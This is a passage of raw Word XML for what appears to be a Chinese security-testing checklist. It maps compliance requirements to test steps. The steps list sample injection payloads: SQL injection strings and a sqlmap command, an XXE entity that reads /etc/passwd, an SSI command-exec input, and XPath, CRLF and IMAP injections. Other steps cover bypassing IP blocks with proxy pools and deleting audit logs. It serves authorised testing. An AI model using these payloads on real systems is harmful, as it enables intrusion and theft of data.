          <w:p w14:paraId="473C510C">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·测试XML解析器是否禁用DTD处理（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>libxml_disable_entity_loader(true)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FFE04CF">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C6F01AF">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="959485" cy="516255"/>
                  <wp:effectExtent l="0" t="0" r="12065" b="17145"/>
                  <wp:docPr id="47"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1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId32"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="959485" cy="516255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="153E4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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72CE46E9">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E834EE1">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E75FFDB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C33C77D">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8.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>接口调用次数无限制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5978DF4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高频调用短信发送接口（如每秒10次请求），验证是否触发频率限制。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE5409C">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·通过多IP或代理池绕过IP黑名单策略。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28EC8886">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7944F85A">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175D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479" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="663F57F1">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安全审计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="271D9B0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c）应对审计记录进行保护，定期备份，避免受到未预期的删除、修改或覆盖等；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35D06921">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3.1越权删除审计记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="642D179F">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1.越权删除审计记录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F01AA9">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·尝试以普通用户身份删除或修改审计日志文件（如/var/log/secure），验证权限限制。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35C7B950">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·验证日志备份策略（如是否每日压缩备份至独立存储）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69FAAD06">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B73839F">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="960120" cy="438785"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="18415"/>
                  <wp:docPr id="49"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8"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId33"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="960120" cy="438785"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3F57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1479" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F34D8E0">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入侵防范</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="297111D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d）应提供数据有效性检验功能，保证通过人机接口输入或通过通信接口输入的内容符合系统设定要求；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="279A8A58">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 SQL注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EBA0DFC">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 LDAP注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B76957">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4.3 ORM注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="015124EC">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4.4 XML注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21021E05">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4.5 SSI注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="694666B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4.6 Xpath注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CDEF845">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4.7 CRLF注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20E74E61">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4.8 IMAP/SMPT注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B69483">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4.9代码注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B6C450C">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4.10命令注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13A1C6F0">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4.11本地文件包含</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4059960B">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4.12远程文件包含</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47DDE7F5">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4.13命令执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2718722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4.14存储型XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FE10FD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4.15反射型XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2828E593">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4.16基于DOM的XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43FBFCA9">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4.17基于flash的XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3518CB71">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4.18 SSRF漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1341850C">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4.19任意文件上传</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5399CC6A">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4.20 URL重定向漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E43DB0B">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4.21格式化字符串处理</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C371B5A">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4.22缓冲区堆溢出</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="092103D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4.23缓冲区栈溢出</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="529C44A3">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4.24缓冲区越界操作</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500207A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4.25整数溢出</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78EC0407">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4.26同步错误</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11637E80">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4.27意外处理错误</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F8B50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4.28点击劫持</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50451CFD">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4.29过程验证缺失</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0675FB2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4.30 HTTP参数篡改</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DADE8AA">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4.31 HTTP参数污染</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71C57649">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669B9C7F">
            <w:pP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1.SQL注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ACF9085">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·在输入字段注入' OR 1=1--、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>' UNION SELECT @@version--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>，检查是否返回数据库错误或数据泄露。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07E83D19">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·使用SQLMap工具自动化探测注入点（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>sqlmap -u "http://target.com/search?q=1"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D19D47">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LDAP注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="173608F9">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AA507C5">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="954405" cy="536575"/>
                  <wp:effectExtent l="0" t="0" r="17145" b="15875"/>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9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="954405" cy="536575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="538A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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5220592D">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E09E8FE">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1D3C235B">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6FD27AF">
            <w:pP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3</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ORM注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27250DB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·测试Hibernate或Django ORM的查询参数（如User.objects.raw("SELECT * FROM users WHERE name='%s'" % name)），验证是否过滤特殊字符。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71D82BE1">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08092CE1">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="960120" cy="438785"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="18415"/>
                  <wp:docPr id="4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8"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId33"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="960120" cy="438785"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="232EA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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11BCDB87">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53E9127">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1C53471B">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1A724EA0">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4</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XML注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41DBAAA7">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·提交恶意XML实体（如&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;），检查是否触发文件读取或SSRF。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04962AE3">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4A0D1D6D">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="959485" cy="516255"/>
                  <wp:effectExtent l="0" t="0" r="12065" b="17145"/>
                  <wp:docPr id="46"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0"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId32"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="959485" cy="516255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="49B7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79" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6615154E">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1DF3896">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B8AB7DE">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71C2C1EA">
            <w:pPr>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5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>SSI注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13BCB6A3">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·输入&lt;!--#exec cmd="ls /"--&gt;，测试服务器是否执行系统命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12613D14">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3DBD0580">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="958215" cy="499745"/>
                  <wp:effectExtent l="0" t="0" r="13335" b="14605"/>
                  <wp:docPr id="45"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39"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId34"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="958215" cy="499745"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1542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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69F8FE70">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04604A1">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692C4437">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5655FE7">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6</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Xpath注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6241E6D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·例如注入' or 1=1 or 'a'='a，验证是否返回全部数据。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1696347A">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7765B784">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="960120" cy="438785"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="18415"/>
                  <wp:docPr id="44"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8"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId33"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="960120" cy="438785"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="199A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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="564CBB10">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8B127D5">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1F51FA1C">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77CF011F">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7</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CRLF注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F4D4F2">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·输入%0d%0aSet-Cookie: hacker=1，检查响应头是否被篡改。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E036C17">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33A8E705">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="951865" cy="445770"/>
                  <wp:effectExtent l="0" t="0" r="635" b="11430"/>
                  <wp:docPr id="4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37"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId35"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="951865" cy="445770"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="654A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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47AFBF1F">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C43F522">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161FF045">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1F61C150">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8</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IMAP/SMPT注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62515584">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·在邮箱登录字段输入test@example.com&lt;LF&gt;LIST，验证是否执行未授权命令。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="453EB12B">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6D027EBE">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>不</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
